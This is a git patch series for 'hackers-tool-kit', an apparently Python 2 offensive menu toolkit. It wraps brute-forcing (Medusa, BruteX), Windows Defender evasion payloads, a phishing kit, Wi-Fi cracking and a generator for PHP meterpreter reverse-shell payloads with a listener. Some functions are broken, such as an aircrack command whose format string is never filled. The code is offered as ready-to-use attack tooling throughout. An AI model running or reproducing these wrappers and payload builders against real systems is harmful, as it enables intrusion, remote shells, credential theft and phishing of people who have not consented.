and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() + + if len(jerar)==0: + print "" + print " Not Found." + elif len(jerar)>2: + jerar.sort() + print "" + print "Possible Hashs:" + print "[+] ",algorithms[jerar[0]] + print "[+] ",algorithms[jerar[1]] + print "" + print "Least Possible Hashs:" + for a in range(int(len(jerar))-2): + print "[+] ",algorithms[jerar[a+2]] + else: + jerar.sort() + print "" + print "Possible Hashs:" + for a in range(len(jerar)): + print "[+] ",algorithms[jerar[a]] +#------------------# +#FIND HASH TYPE END# + + +#RESTART SCRIPT START# +#--------------------# +def restart(): + os.system("clear") + os.system("cd /root/hackers-tool-kit && python htk.py") +#------------------# +#RESTART SCRIPT END# + + +#MEDUSA AUTOMATED START# +#----------------------# +def medusa(): + k = raw_input("Target Host: ") + u = raw_input("User: ") + p = raw_input("Wordlist: ") + os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") + print "\n" + m = raw_input("Module: ") + n = raw_input("Port: ") + a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) + os.system(a) +#--------------------# +#MEDUSA AUTOMATED END# + + +#WAF DETECTER START# +#------------------# +def wafwoof(): + j = raw_input("Enter Target: ") + k = 'wafw00f {0}'.format(j) + os.system(k) +#----------------# +#WAF DETECTER END# + + +#CLOUDFLARE BYPASS START# +#-----------------------# +def cloud(): + + subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] + + print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") + + host = raw_input("Enter Target: ") + for sublist in subdomainlist: + try: + hosts = str(sublist) + "." + str(host) + showip = socket.gethostbyname(str(hosts)) + print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) + except: + pass + + print ( '\033[93m' + "Credit Goes To: tugrulbey.com") + print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") +#---------------------# +#CLOUDFLARE BYPASS END# + + +#BRUTEFORCE ALL SERVICES ON WEB START# +#------------------------------------# +def brutex(): + k = raw_input("Target: ") + p = raw_input("Port: ") + a = 'brutex {0} {1}'.format(k,p) + os.system(a) +#----------------------------------# +#BRUTEFORCE ALL SERVICES ON WEB END# + + +#METERPRETER HELP MENU START# +#---------------------------# +def methelp(): + os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") +#-------------------------# +#METERPRETER HELP MENU END# + + +#WINDOWS DEFENDER BYPASS START# +#-----------------------------# +def winbyp(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + pay = raw_input("Payload: ") + port = raw_input("Port: ") + name = raw_input("File Name: ") + os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') + os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) + os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') + os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) + os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) + os.system('echo "run\n" >> winbyp.rc') + os.system("service postgresql restart") + os.system('msfconsole -r winbyp.rc') + os.system('rm -rf winbyp.rc') +#---------------------------# +#WINDOWS DEFENDER BYPASS END# + + +#USE A EXPLOIT START# +#-------------------# +def exploit(): + os.system("cat /root/hackers-tool-kit/tools/exploits.txt") + print "\n" + f = raw_input("Select Exploit: ") + os.system('echo "use {0}\n" >> exploit.rc'.format(f)) + os.system('echo "show options\n" >> exploit.rc'.format(f)) + os.system("service postgresql restart") + os.system('msfconsole -r exploit.rc') + os.system('rm -rf exploit.rc') +#-----------------# +#USE A EXPLOIT END# + + +#PHISHING AUTOMATED START# +#------------------------# +def phish(): + os.system("bash /root/shellphish/shellphish.sh") +#----------------------# +#PHISHING AUTOMATED END# + + +#LIST DATABASE INFO START# +#------------------------# +def datalist(): + os.system('echo "hosts\n" >> data.rc') + os.system('echo "services\n" >> data.rc') + os.system("service postgresql restart") + os.system('msfconsole -r data.rc') + os.system('rm -rf data.rc') +#----------------------# +#LIST DATABASE INFO END# + + +#ALL METASPLOIT EVASIONS START# +#-----------------------------# +def msfev(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show evasion'""") +#---------------------------# +#ALL METASPLOIT EVASIONS END# + + +#FULLY UPDATE YOUR OS START# +#--------------------------# +def upgrade(): + os.system("apt update && apt upgrade") +#------------------------# +#FULLY UPDATE YOUR OS END# + + +#USE A NMAP SCRIPT START# +#-----------------------# +def nscript(): + os.system("cat /root/hackers-tool-kit/tools/scripts.txt") + print "\n" + j = raw_input(G+"Select Script:\033[0m ") + k = raw_input(G+"Target:\033[0m ") + a = 'nmap --script {0} {1}'.format(j,k) + os.system(a) +#---------------------# +#USE A NMAP SCRIPT END# + + +#GET HOST SSH VERSION START# +#--------------------------# +def sshver(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + b = raw_input(G+"Timeout: \033[0m") + os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') + os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) + os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) + os.system('echo "show options\n" >> sshver.rc') + os.system('echo "run\n" >> sshver.rc') + os.system("service postgresql restart") + os.system('msfconsole -r sshver.rc') + os.system('rm -rf sshver.rc') +#------------------------# +#GET HOST SSH VERSION END# + + +#USE PROXYCHAINS FOR WEB START# +#-----------------------------# +def chains(): + h = raw_input("Enter Browser: ") + j = raw_input("Enter Website: ") + a = 'proxychains {0} {1}'.format(h,j) + os.system(a) +#---------------------------# +#USE PROXYCHAINS FOR WEB END# + + +#GET HOST MYSQL VERSION START# +#----------------------------# +def mysqlv(): + f = raw_input(G+"Target: \033[0m") + g = raw_input(G+"Port: \033[0m") + t = raw_input(G+"Threads: \033[0m") + os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') + os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) + os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) + os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) + os.system('echo "show options\n" >> mysqlv.rc') + os.system('echo "run\n" >> mysqlv.rc') + os.system("service postgresql restart") + os.system('msfconsole -r mysqlv.rc') + os.system('rm -rf mysqlv.rc') +#--------------------------# +#GET HOST MYSQL VERSION END# + + +#CONNECT TO A HOST START# +#-----------------------# +def connect(): + h = raw_input("Enter Host: ") + print "\n" + print " How would you like to connect?" + print "---------------------------------------" + print "ssh: Secure Shell | Default Port = 22" + print "---------------------------------------" + print "telnet: Network Virtual Terminal | Default Port = 23" + print "---------------------------------------" + j = raw_input("Select Protocol: ") + a = '{0} {1}'.format(j,h) + os.system(a) +#---------------------# +#CONNECT TO A HOST END# + + +#ABOUT ME / THE CREATOR START# +#----------------------------# +def about(): + print "\033[92m------------------------------------------------------------" + print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" + print "------------------------------------------------------------" + print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" + print "------------------------------------------------------------" + print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" + print "------------------------------------------------------------" + print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" + print "------------------------------------------------------------\033[0m" +#--------------------------# +#ABOUT ME / THE CREATOR END# + + +#OPEN NEW TERMINAL START# +#-----------------------# +def terminal(): + os.system("gnome-terminal") +#---------------------# +#OPEN NEW TERMINAL END# + + +#AIRCRACK-NG [WIFI HACK] AUTOMATED START# +#---------------------------------------# +def aircrack(): + b = raw_input(G+"BSSID: \033[0m") + e = raw_input(G+"ESSID: \033[0m") + w = raw_input(G+"Wordlist: \033[0m") + h = raw_input(G+"Handshake file: \033[0m") + os.system("iwconfig") + i = raw_input(G+"Interface: \033[0m") + a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' + os.system(a) +#-------------------------------------# +#AIRCRACK-NG [WIFI HACK] AUTOMATED END# + + +#GET SOURCE CODE OF WEB START# +#----------------------------# +def source(): + t = raw_input(B+"Target:\033[0m ") + print Y+"\nWould you like to save source code in a file?\n\033[0m" + q = raw_input(R+"[y/n]:\033[0m ") + if q == "n": + an = 'curl {0}'.format(t) + os.system(an) + if q == "y": + ay = 'curl {0} >> /root/{1}.txt'.format(t,t) + os.system(ay) + print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) +#--------------------------# +#GET SOURCE CODE OF WEB END# + + +#WEB DIRECTORY SCAN START# +#------------------------# +def dirscan(): + t = raw_input(B+"Target URL:\033[91m ") + print "\033[0m" + a = 'dirb {0}'.format(t) + os.system(a) +#----------------------# +#WEB DIRECTORY SCAN END# + + + +#APACHE SERVER START# +#-------------------# +def aserver(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + print Y+"Starting Server\033[0m..." + os.system("service apache2 start") + br = raw_input(G+"Browser: \033[0m") + a = '{0} {1}'.format(br,ipaddr) + os.system(a) + stop = raw_input("hit enter to stop server: ") + print Y+"Stopping Server\033[0m..." + os.system("service apache2 stop") +#-----------------# +#APACHE SERVER END# + + +#CLEAR ALL START# +#---------------# +def clearall(): + os.system("clear") +#-------------# +#CLEAR ALL END# + + +#RUN A FILE START# +#----------------# +def run(): + print Y+"what program do you want to run the file with Example: python" + p = raw_input(N+"Program: ") + print "\n" + print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" + print "\n" + f = raw_input("Enter File: ") + print "\n" + print Y+"would you like to add arguments when running the file [y/n]\033[0m" + yn = raw_input(G+"[y or n]: \033[0m") + if yn == "n" : + a = '{0} {1}'.format(p,f) + os.system(a) + if yn == "y" : + arg = raw_input("Enter Arguments: ") + a = '{0} {1} {2}'.format(p,f,arg) + os.system(a) +#--------------# +#RUN A FILE END# + + +#REFRESH BANNER START# +#--------------------# +def banner(): + os.system("clear") + mainbanner() +#------------------# +#REFRESH BANNER END# + + +#PHP PAYLOAD START# +#-----------------# +def phpload(): + #msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.20 LPORT=443 -o /root/phphack.php# + lhost = raw_input("LHOST: ") + lport = raw_input("LPORT: ") + filen = raw_input("File Name: ") + a = 'msfvenom -p php/meterpreter/reverse_tcp LHOST={0} LPORT={1} -o /root/{2}.php'.format(lhost,lport,filen) + os.system(a) + print "would you like to run this file in a multi handler?" + yn = raw_input("[y/n]> ") + if yn == "y": + os.system('echo "use exploit/multi/handler\n" >> phpload.rc') + os.system('echo "set payload php/meterpreter/reverse_tcp\n" >> phpload.rc') + os.system('echo "set LHOST {0}\n" >> phpload.rc'.format(lhost)) + os.system('echo "set LPORT {0}\n" >> phpload.rc'.format(lport)) + os.system('echo "exploit\n" >> phpload.rc') + os.system("service postgresql restart") + os.system('msfconsole -r phpload.rc') + os.system('rm -rf phpload.rc') + if yn == "n": + os.system('echo " "') +#---------------# +#PHP PAYLOAD END# + + +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# +#-------------------------------------------------------------------------------------------------# +def main(): + found = False + while not found: + x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') + if x == "?": + help() + if x == "winload" : + winload() + if x == "clear" : + os.system("clear") + mainbanner() + if x == "andload": + andload() + if x == "command": + c = raw_input("Command: ") + os.system(c) + if x == "msfcon" : + os.system("service postgresql start") + os.system("msfconsole") + if x == "set": + os.system("setoolkit") + if x == "msfven": + print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" + v = raw_input(G+"MSFVENOM: \033[0m") + os.system("msfvenom", v) + if x == "gmail" : + gmail() + if x == "insta": + insta() + if x == "fb" : + fb() + if x == "ipgrab": + ipgrab() + if x == "myip": + myip() + if x == "wifite": + wifite() + if x == "mon" : + mon() + if x == "netdev" : + netdev() + if x == "scannet": + scannet() + if x == "exit" : + import sys + print "follow \033[92m@unkn0wn_bali\033[0m on instagram" + sys.exit() + if x == "rebootl": + print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" + c = raw_input("[y/n]> ") + if c == "y" : + os.system("reboot") + if c == "n" : + os.system("clear") + mainbanner() + main() + if x == "port": + port() + if x == "info": + info() + if x == "sysinfo": + sysinfo() + if x == "msfex": + msfex() + if x == "udp": + udp() + if x == "tcp": + tcp() + if x == "syn": + syn() + if x == "msfpa": + msfpa() + if x == "msfau": + msfau() + if x == "ping" : + ping() + if x == "multih": + multih() + if x == "msfall": + msfall() + if x == "hydra" : + hydra() + if x == "cupp": + cupp() + if x == "vdir": + vdir() + if x == "monoff": + monoff() + if x == "vpn": + vpn() + if x == "vpnoff": + vpnoff() + if x == "slowl": + slowl() + if x == "pidox": + pidox() + if x == "specnet": + specnet() + if x == "pingen": + pingen() + if x == "reaver": + reaver() + if x == "deauth": + deauth() + if x == "macc": + macc() + if x == "macoff": + macoff() + if x == "arpspoof": + arpspoof() + if x == "sslscan": + sslscan() + if x == "payload": + payload() + if x == "crunch": + crunch() + if x == "traff": + traff() + if x == "resa": + resa() + if x == "resu": + resu() + if x == "hashid": + hashid() + if x == "restart": + restart() + if x == "medusa": + medusa() + if x == "wafwoof": + wafwoof() + if x == "cloud": + cloud() + if x == "brutex": + brutex() + if x == "methelp": + methelp() + if x == "winbyp": + winbyp() + if x == "exploit": + exploit() + if x == "phish": + phish() + if x == "datalist": + datalist() + if x == "msfev": + msfev() + if x == "upgrade": + upgrade() + if x == "nscript": + nscript() + if x == "sshver": + sshver() + if x == "chains": + chains() + if x == "mysqlv": + mysqlv() + if x == "connect": + connect() + if x == "about": + about() + if x == "terminal": + terminal() + if x == "aircrack": + aircrack() + if x == "source": + source() + if x == "dirscan": + dirscan() + if x == "aserver": + aserver() + if x == "clearall": + clearall() + if x == "run": + run() + if x == "banner": + banner() + if x == "phpload": + phpload() + found = True +mainbanner() +main() +#-------------------------------------------------------------------------------------------------# +#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 187fdc72deef143dbba3c06af2f8b3fb4e91cf29 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 14 May 2019 21:57:26 +0100 Subject: [PATCH 117/214] Update README.md --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 6565ef1..7dc4ec5 100644 --- a/README.md +++ b/README.md @@ -49,11 +49,11 @@ this is where i will try to put the most recent updates -* added a option to start a server via apache - * added a clearall and a run option * everytime you run the script it will switch randomly between different banners * added banner option (same thing as clear option just people might not know that clear randomizes the banner) also added more banners + +* added a phpload option From 3dbb15d75fbc61925c096faf1a90332a0dd71ff1 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 14 May 2019 22:01:15 +0100 Subject: [PATCH 118/214] Delete htk.py --- htk.py | 2740 -------------------------------------------------------- 1 file changed, 2740 deletions(-) delete mode 100644 htk.py diff --git a/htk.py b/htk.py deleted file mode 100644 index c7b48f5..0000000 --- a/htk.py +++ /dev/null @@ -1,2740 +0,0 @@ -#!/usr/local/bin/python -# coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to show / edit this script without my credit -#to ask questions or report a problem message me on instagram @unkn0wn_bali -""" - - - ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ -▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ -▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ -░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ -░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ - ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ - ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ - ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ - ░ ░ - - -""" -#this is the loading screen \ the imports START# -#----------------------------------------------# -import os -print "Starting hackers-tool-kit... [ * ]-[0%]" -import platform -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[5%]" -import webbrowser -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[9%]" -import hashlib -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[14%]" -import subprocess -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[19%]" -import zipfile -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[23%]" -import colorama -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[25%]" -from modules import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[26%]" -import modules.colors -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[27%]" -import builtwith -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[29%]" -from urllib2 import urlopen -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[31%]" -from urllib2 import URLError -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[34%]" -from urllib2 import HTTPError -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[38%]" -from urllib import urlencode -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[39%]" -from plugins.DNSDumpsterAPI import DNSDumpsterAPI -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -#COLOR VARIABLES START# -#---------------------# -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -#-------------------# -#COLOR VARIABLES END# - -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -#----------------------------------------------# -#this is the loading screen \ the imports END# - - -#MAIN STARTING BANNER START# -#--------------------------# -def mainbanner1(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def mainbanner2(): - print """\033[92m - ▄█ ▄█ ▄█ - ███ ███ ███ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███▌ ███▌ ███▌ - ███ ███ ███ 